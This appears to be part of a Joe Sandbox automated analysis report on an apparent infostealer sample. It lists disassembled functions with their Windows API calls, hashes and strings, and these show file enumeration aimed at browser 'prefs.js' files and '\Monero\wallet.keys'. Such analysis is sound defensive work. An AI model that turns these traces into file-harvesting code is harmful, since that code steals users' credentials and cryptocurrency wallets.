                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: df599522885d4c31a2a1472dfd25860125ecfd81b3c07edd2cfb6a0f9e302f38
                              • Instruction ID: bd708a40ceb6570b789e82efe7eaef93fec82bb1a842f9be6f64185c65e113d9
                              • Opcode Fuzzy Hash: df599522885d4c31a2a1472dfd25860125ecfd81b3c07edd2cfb6a0f9e302f38
                              • Instruction Fuzzy Hash: 206197B2900618ABDB21EFA0DC45FEA777CBB58705F0445C9F60996040EB75EB89CFA1
                              Function 00154570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00154580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00154587
                              • wsprintfA.USER32 ref: 001545A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001545BD
                              • StrCmpCA.SHLWAPI(?,00160FC4), ref: 001545EB
                              • StrCmpCA.SHLWAPI(?,00160FC8), ref: 00154601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0015468B
                              • FindClose.KERNEL32(000000FF), ref: 001546A0
                              • lstrcat.KERNEL32(?,00DDEB00), ref: 001546C5
                              • lstrcat.KERNEL32(?,00DDDA08), ref: 001546D8
                              • lstrlen.KERNEL32(?), ref: 001546E5
                              • lstrlen.KERNEL32(?), ref: 001546F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 880296b99d3aa3e5821cba9891e7f1a87030afbcb90098e3c084ecde7e6a1384
                              • Instruction ID: 4cb061b0f0d587b51a48509594901e597a82f5c90fe3f71b1389cc6412477b6b
                              • Opcode Fuzzy Hash: 880296b99d3aa3e5821cba9891e7f1a87030afbcb90098e3c084ecde7e6a1384
                              • Instruction Fuzzy Hash: 5D5187B1540318ABD725EBB0DC89FEE777CAB58301F4045C9F61996190EB749B88CFA2
                              Function 00153EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00153EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00153EDA
                              • StrCmpCA.SHLWAPI(?,00160FAC), ref: 00153F08
                              • StrCmpCA.SHLWAPI(?,00160FB0), ref: 00153F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0015406C
                              • FindClose.KERNEL32(000000FF), ref: 00154081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 9ffc8ccc524d361a2aa352a55e81a050fc4796d7af849dc4332372ad3a9c18e3
                              • Instruction ID: e3416d66c342244071d98725afd7d163270d13e7b9073fc4f735af8ec4b74665
                              • Opcode Fuzzy Hash: 9ffc8ccc524d361a2aa352a55e81a050fc4796d7af849dc4332372ad3a9c18e3
                              • Instruction Fuzzy Hash: 6D519BB1900718EBCB25EBB0DC85EEA777CBB58301F4045C9B66996040DB75DB89CF61
                              Function 0014ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0014ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0014ED55
                              • StrCmpCA.SHLWAPI(?,00161538), ref: 0014EDAB
                              • StrCmpCA.SHLWAPI(?,0016153C), ref: 0014EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0014F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 0fd6a0b26e81d447996550f7a4290312a4cb3937e1b9da8e6f01561481918b7c
                              • Instruction ID: fadd55c65342fa6d83c6ffd523dc41b93d0efc58026e1c74ebe2931b4cc931c8
                              • Opcode Fuzzy Hash: 0fd6a0b26e81d447996550f7a4290312a4cb3937e1b9da8e6f01561481918b7c
                              • Instruction Fuzzy Hash: 48E1D171951118DAEB55FB60CC52EEE733CAF64302F804299B91A66052EF706F8ECF52
                              Function 0014F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001615B8,00160D96), ref: 0014F71E
                              • StrCmpCA.SHLWAPI(?,001615BC), ref: 0014F76F
                              • StrCmpCA.SHLWAPI(?,001615C0), ref: 0014F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0014FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: fdaed274993f4e09b78e53f489d3f19ac5d189babf6784a5f48dd2022d5dc760
                              • Instruction ID: 44bea2e385826463c2474d4e9d6247e55ead3734a32845d496fc36b6ef5b7287
                              • Opcode Fuzzy Hash: fdaed274993f4e09b78e53f489d3f19ac5d189babf6784a5f48dd2022d5dc760
                              • Instruction Fuzzy Hash: 77B15471940118DBDB24FF60DC55AEE7379AF64301F8082A8A81A9B151EF316B4ECF92
                              Function 001416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0016510C,?,?,?,001651B4,?,?,00000000,?,00000000), ref: 00141923
                              • StrCmpCA.SHLWAPI(?,0016525C), ref: 00141973
                              • StrCmpCA.SHLWAPI(?,00165304), ref: 00141989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00141D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00141DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00141E20
                              • FindClose.KERNEL32(000000FF), ref: 00141E32
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 414b4e0a94682e06a97e26887043ab4fcc6c6b220ee8ed7571cc55be307b854c
                              • Instruction ID: b56f3b98657f2d05603859b66b390226a4a477ea817e5c655f1efa97b01857fe
                              • Opcode Fuzzy Hash: 414b4e0a94682e06a97e26887043ab4fcc6c6b220ee8ed7571cc55be307b854c
                              • Instruction Fuzzy Hash: 4312D171990118DBDB15FB60CC96AEE7378BF64302F804299B9166A091EF706F8DCF91
                              Function 0014DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00160C2E), ref: 0014DE5E
                              • StrCmpCA.SHLWAPI(?,001614C8), ref: 0014DEAE
                              • StrCmpCA.SHLWAPI(?,001614CC), ref: 0014DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0014E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 23719186d9975c5a9ba1dab9664fcfe2413073b684401c6aeb15b5aa65fe35ce
                              • Instruction ID: 5d62f1836a2e9c5c9ea8d2abbac53f86c13e3a7066668cf245876ae8840d0d33
                              • Opcode Fuzzy Hash: 23719186d9975c5a9ba1dab9664fcfe2413073b684401c6aeb15b5aa65fe35ce
                              • Instruction Fuzzy Hash: 07F18F71894118DADB15EB60DC95EEE7378BF24302FC042D9B91A66091EF706B8ECF51
                              Function 0014DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001614B0,00160C2A), ref: 0014DAEB
                              • StrCmpCA.SHLWAPI(?,001614B4), ref: 0014DB33
                              • StrCmpCA.SHLWAPI(?,001614B8), ref: 0014DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0014DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d43de36d7026f0fd913886a3be0b0ae5663e1f02c81d49c34c85449201964023
                              • Instruction ID: 2b35a651c25f321fcd101e31b7c22c1f2d307c387dafdf428ee4a7236600701e
                              • Opcode Fuzzy Hash: d43de36d7026f0fd913886a3be0b0ae5663e1f02c81d49c34c85449201964023
                              • Instruction Fuzzy Hash: 69917472940204E7CB14FBB0EC569ED777DAF98301F808659FD1A9A191EF349B0D8B92
                              Function 00157B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001605AF), ref: 00157BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00157BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00157C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00157C62
                              • LocalFree.KERNEL32(00000000), ref: 00157D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: d25ceac9644fcf1be972eef8481fe40dee2065e040720a2ad53781118ef732e7
                              • Instruction ID: 06a82af7b36e3a99b07f794f35eee6fa88bc41afed311cbcd44af151a7651cbc
                              • Opcode Fuzzy Hash: d25ceac9644fcf1be972eef8481fe40dee2065e040720a2ad53781118ef732e7
                              • Instruction Fuzzy Hash: 8D418171940218EBDB24DB94DC99BEEB778FF54301F5042D9E81966180DB342F89CFA1
                              Function 0051936D Relevance: 10.4, Strings: 7, Instructions: 1647COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
